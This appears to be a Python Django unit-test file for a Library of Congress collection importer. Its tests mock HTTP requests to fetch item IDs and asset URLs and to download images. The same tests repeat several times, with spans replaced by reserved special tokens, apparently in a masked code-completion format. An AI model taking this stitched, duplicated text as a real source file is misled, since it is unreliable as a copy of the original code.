@patch('importer.tasks.requests.get')
def test_get_collection_asset_urls(self, mock_get):
"""
Testing no of collection item asset urls available in given item id
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [
'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'
])
@patch('importer.tasks.requests.get')
def test_get_collection_no_asset_urls(self, mock_get):
"""
Testing no of collection item asset urls not available in given item id
"""
mock_resp = MockResponse({}, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [])
class DownloadWriteCollcetionItemAssetTest(TestCase):
@patch('importer.tasks.requests.get')
def test_download_write_asset_item(self, mock_get):
"""
Testing download image and write into disk without error
"""
mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
abc = download_write_collection_item_asset('dumy/image/url', 'foo')
self.assertEquals(abc, True)
@patch('importer.tasks.requests.get')
def test_download_write_asset_item_error(self, mock_get):
"""
Testing download image with exception
"""
mock_resp = MockResponse({}, 200, content=Exception('boom'))
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
abc = download_write_collection_item_asset('dumy/image/url', 'foo')
self.assertEquals(abc, False)
class DownloadWriteCollectionItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given collection url
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.
COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [mock_resp_page, mock_page1_result,
mock_page2_result, mock_resp_item_urls]
mock_save.return_value = None
download_write_collection_item_assets(self.name, self.project, self.url
)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes_no_db_entry(self,
mock_get, mock_save):
"""
Testing no of collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails
"""
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.
COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [mock_resp_page, mock_page1_result,
mock_page2_result, mock_resp_item_urls]
mock_save.return_value = None
download_write_collection_item_assets(self.name, self.project, self.url
)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
class DownloadWriteItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given item id
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GETRequestDataTest(TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@patch('importer.tasks.requests.get')
def test_get_request_not_success(self, mock_get):
"""get data on not success"""
mock_resp_instance = MockResponse({'msg': 'bad request'}, 400)
mock_get.return_value = mock_resp_instance
response = get_request_data(self.url)
self.assertEqual(mock_resp_instance.status_code, 400)
self.assertEqual(response, {})
<|reserved_special_token_0|>
class GetCollectionPagesTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.requests.get')
def test_get_collection_pages(self, mock_get):
"""
get collection pages successfully with pages info
"""
mock_resp_instance = MockResponse({'pagination': {'total': 10}}, 200)
mock_get.return_value = mock_resp_instance
response = get_collection_pages(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 10)
@patch('importer.tasks.requests.get')
def test_get_collection_sucess_no_pages(self, mock_get):
"""
get collection pages successfully with no pages info
"""
mock_resp_instance = MockResponse({}, 200)
mock_get.return_value = mock_resp_instance
response = get_collection_pages(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 0)
class GetCollectionItemidsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.requests.get')
def test_get_collection_item_ids(self, mock_get):
"""
Testing no of collection item ids available in given collection url
"""
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
response = get_collection_item_ids(self.url, 2)
self.assertListEqual(response, ['mss37820001'])
@patch('importer.tasks.requests.get')
def test_get_collection_item_ids_no_ids(self, mock_get):
"""
Testing no of collection item ids not availabel collection url
"""
mock_page1_result = MockResponse({}, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
response = get_collection_item_ids(self.url, 2)
self.assertListEqual(response, [])
class GetCollectionItemAssetURLsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.item_id = 'mss37820001'
@patch('importer.tasks.requests.get')
def test_get_collection_asset_urls(self, mock_get):
"""
Testing no of collection item asset urls available in given item id
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [
'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'
])
@patch('importer.tasks.requests.get')
def test_get_collection_no_asset_urls(self, mock_get):
"""
Testing no of collection item asset urls not available in given item id
"""
mock_resp = MockResponse({}, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [])
class DownloadWriteCollcetionItemAssetTest(TestCase):
@patch('importer.tasks.requests.get')
def test_download_write_asset_item(self, mock_get):
"""
Testing download image and write into disk without error
"""
mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
abc = download_write_collection_item_asset('dumy/image/url', 'foo')
self.assertEquals(abc, True)
@patch('importer.tasks.requests.get')
def test_download_write_asset_item_error(self, mock_get):
"""
Testing download image with exception
"""
mock_resp = MockResponse({}, 200, content=Exception('boom'))
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
abc = download_write_collection_item_asset('dumy/image/url', 'foo')
self.assertEquals(abc, False)
class DownloadWriteCollectionItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given collection url
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.
COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [mock_resp_page, mock_page1_result,
mock_page2_result, mock_resp_item_urls]
mock_save.return_value = None
download_write_collection_item_assets(self.name, self.project, self.url
)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes_no_db_entry(self,
mock_get, mock_save):
"""
Testing no of collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails
"""
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.
COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [mock_resp_page, mock_page1_result,
mock_page2_result, mock_resp_item_urls]
mock_save.return_value = None
download_write_collection_item_assets(self.name, self.project, self.url
)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
class DownloadWriteItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given item id
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GetItemIdFromItemURLTest(TestCase):
def test_get_item_id_from_item_url_with_slash(self):
"""
Testing get item id from item url if ends with /
"""
url = 'https://www.loc.gov/item/mss859430021/'
resp = get_item_id_from_item_url(url)
self.assertEqual(resp, 'mss859430021')
def test_get_item_id_from_item_url_without_slash(self):
"""
Testing get item id from item url if ends without /
"""
url = 'https://www.loc.gov/item/mss859430021'
resp = get_item_id_from_item_url(url)
self.assertEqual(resp, 'mss859430021')
class GETRequestDataTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
:return:
"""
self.url = 'https://www.loc.gov/item/mss859430021?fo=json'
@patch('importer.tasks.requests.get')
def test_get_request_success_json_data(self, mock_get):
"""get data on success json data"""
mock_resp_instance = MockResponse({'msg': 'success'}, 200)
mock_get.return_value = mock_resp_instance
response = get_request_data(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, mock_resp_instance.json())
@patch('importer.tasks.requests.get')
def test_get_request_not_success(self, mock_get):
"""get data on not success"""
mock_resp_instance = MockResponse({'msg': 'bad request'}, 400)
mock_get.return_value = mock_resp_instance
response = get_request_data(self.url)
self.assertEqual(mock_resp_instance.status_code, 400)
self.assertEqual(response, {})
@patch('importer.tasks.requests.get')
def test_get_request_normal_response(self, mock_get):
"""if json false return repose object with content"""
mock_resp_instance = MockResponse({'msg': 'success'}, 200, content=
'abc')
mock_get.return_value = mock_resp_instance
response = get_request_data(self.url, json_resp=False)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, mock_resp_instance)
class GetCollectionPagesTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.requests.get')
def test_get_collection_pages(self, mock_get):
"""
get collection pages successfully with pages info
"""
mock_resp_instance = MockResponse({'pagination': {'total': 10}}, 200)
mock_get.return_value = mock_resp_instance
response = get_collection_pages(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 10)
@patch('importer.tasks.requests.get')
def test_get_collection_sucess_no_pages(self, mock_get):
"""
get collection pages successfully with no pages info
"""
mock_resp_instance = MockResponse({}, 200)
mock_get.return_value = mock_resp_instance
response = get_collection_pages(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 0)
class GetCollectionItemidsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.requests.get')
def test_get_collection_item_ids(self, mock_get):
"""
Testing no of collection item ids available in given collection url
"""
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
response = get_collection_item_ids(self.url, 2)
self.assertListEqual(response, ['mss37820001'])
@patch('importer.tasks.requests.get')
def test_get_collection_item_ids_no_ids(self, mock_get):
"""
Testing no of collection item ids not availabel collection url
"""
mock_page1_result = MockResponse({}, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
response = get_collection_item_ids(self.url, 2)
self.assertListEqual(response, [])
class GetCollectionItemAssetURLsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.item_id = 'mss37820001'
@patch('importer.tasks.requests.get')
def test_get_collection_asset_urls(self, mock_get):
"""
Testing no of collection item asset urls available in given item id
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [
'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'
])
@patch('importer.tasks.requests.get')
def test_get_collection_no_asset_urls(self, mock_get):
"""
Testing no of collection item asset urls not available in given item id
"""
mock_resp = MockResponse({}, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [])
class DownloadWriteCollcetionItemAssetTest(TestCase):
@patch('importer.tasks.requests.get')
def test_download_write_asset_item(self, mock_get):
"""
Testing download image and write into disk without error
"""
mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
abc = download_write_collection_item_asset('dumy/image/url', 'foo')
self.assertEquals(abc, True)
@patch('importer.tasks.requests.get')
def test_download_write_asset_item_error(self, mock_get):
"""
Testing download image with exception
"""
mock_resp = MockResponse({}, 200, content=Exception('boom'))
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
abc = download_write_collection_item_asset('dumy/image/url', 'foo')
self.assertEquals(abc, False)
class DownloadWriteCollectionItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given collection url
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.
COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [mock_resp_page, mock_page1_result,
mock_page2_result, mock_resp_item_urls]
mock_save.return_value = None
download_write_collection_item_assets(self.name, self.project, self.url
)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes_no_db_entry(self,
mock_get, mock_save):
"""
Testing no of collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails
"""
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.
COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [mock_resp_page, mock_page1_result,
mock_page2_result, mock_resp_item_urls]
mock_save.return_value = None
download_write_collection_item_assets(self.name, self.project, self.url
)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
class DownloadWriteItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given item id
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MockResponse:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def iter_content(self, chunk_size=None):
return io.BytesIO(self.content.encode())
class GetItemIdFromItemURLTest(TestCase):
def test_get_item_id_from_item_url_with_slash(self):
"""
Testing get item id from item url if ends with /
"""
url = 'https://www.loc.gov/item/mss859430021/'
resp = get_item_id_from_item_url(url)
self.assertEqual(resp, 'mss859430021')
def test_get_item_id_from_item_url_without_slash(self):
"""
Testing get item id from item url if ends without /
"""
url = 'https://www.loc.gov/item/mss859430021'
resp = get_item_id_from_item_url(url)
self.assertEqual(resp, 'mss859430021')
class GETRequestDataTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
:return:
"""
self.url = 'https://www.loc.gov/item/mss859430021?fo=json'
@patch('importer.tasks.requests.get')
def test_get_request_success_json_data(self, mock_get):
"""get data on success json data"""
mock_resp_instance = MockResponse({'msg': 'success'}, 200)
mock_get.return_value = mock_resp_instance
response = get_request_data(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, mock_resp_instance.json())
@patch('importer.tasks.requests.get')
def test_get_request_not_success(self, mock_get):
"""get data on not success"""
mock_resp_instance = MockResponse({'msg': 'bad request'}, 400)
mock_get.return_value = mock_resp_instance
response = get_request_data(self.url)
self.assertEqual(mock_resp_instance.status_code, 400)
self.assertEqual(response, {})
@patch('importer.tasks.requests.get')
def test_get_request_normal_response(self, mock_get):
"""if json false return repose object with content"""
mock_resp_instance = MockResponse({'msg': 'success'}, 200, content=
'abc')
mock_get.return_value = mock_resp_instance
response = get_request_data(self.url, json_resp=False)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, mock_resp_instance)
class GetCollectionPagesTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.requests.get')
def test_get_collection_pages(self, mock_get):
"""
get collection pages successfully with pages info
"""
mock_resp_instance = MockResponse({'pagination': {'total': 10}}, 200)
mock_get.return_value = mock_resp_instance
response = get_collection_pages(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 10)
@patch('importer.tasks.requests.get')
def test_get_collection_sucess_no_pages(self, mock_get):
"""
get collection pages successfully with no pages info
"""
mock_resp_instance = MockResponse({}, 200)
mock_get.return_value = mock_resp_instance
response = get_collection_pages(self.url)
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 0)
class GetCollectionItemidsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.requests.get')
def test_get_collection_item_ids(self, mock_get):
"""
Testing no of collection item ids available in given collection url
"""
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
response = get_collection_item_ids(self.url, 2)
self.assertListEqual(response, ['mss37820001'])
@patch('importer.tasks.requests.get')
def test_get_collection_item_ids_no_ids(self, mock_get):
"""
Testing no of collection item ids not availabel collection url
"""
mock_page1_result = MockResponse({}, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
response = get_collection_item_ids(self.url, 2)
self.assertListEqual(response, [])
class GetCollectionItemAssetURLsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.item_id = 'mss37820001'
@patch('importer.tasks.requests.get')
def test_get_collection_asset_urls(self, mock_get):
"""
Testing no of collection item asset urls available in given item id
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [
'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'
])
@patch('importer.tasks.requests.get')
def test_get_collection_no_asset_urls(self, mock_get):
"""
Testing no of collection item asset urls not available in given item id
"""
mock_resp = MockResponse({}, 200)
mock_get.return_value = mock_resp
response = get_collection_item_asset_urls(self.item_id)
self.assertListEqual(response, [])
class DownloadWriteCollcetionItemAssetTest(TestCase):
@patch('importer.tasks.requests.get')
def test_download_write_asset_item(self, mock_get):
"""
Testing download image and write into disk without error
"""
mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
abc = download_write_collection_item_asset('dumy/image/url', 'foo')
self.assertEquals(abc, True)
@patch('importer.tasks.requests.get')
def test_download_write_asset_item_error(self, mock_get):
"""
Testing download image with exception
"""
mock_resp = MockResponse({}, 200, content=Exception('boom'))
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
abc = download_write_collection_item_asset('dumy/image/url', 'foo')
self.assertEquals(abc, False)
class DownloadWriteCollectionItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes(self, mock_get, mock_save):
"""
Testing no of collection item asset urls available in given collection url
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.
COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [mock_resp_page, mock_page1_result,
mock_page2_result, mock_resp_item_urls]
mock_save.return_value = None
download_write_collection_item_assets(self.name, self.project, self.url
)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes_no_db_entry(self,
